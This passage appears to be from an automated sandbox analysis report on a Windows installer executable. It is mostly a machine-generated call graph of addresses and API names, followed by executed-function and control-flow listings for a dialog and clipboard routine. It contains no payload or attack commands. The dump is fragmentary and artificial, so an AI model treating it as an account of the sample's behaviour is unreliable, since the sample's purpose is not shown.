3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3956 405d88 3952->3956 3955 405d83 CharNextW 3953->3955 3953->3956 3954 405dac 3954->3911 3955->3954 3956->3954 3957 405d06 CharNextW 3956->3957 3957->3956 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                          Executed Functions

                                          Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                          • GetClientRect.USER32(?,?), ref: 00405196
                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                          • ShowWindow.USER32(00000008), ref: 00405333
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                          • CreatePopupMenu.USER32 ref: 00405376
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                          • EmptyClipboard.USER32 ref: 00405411
                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
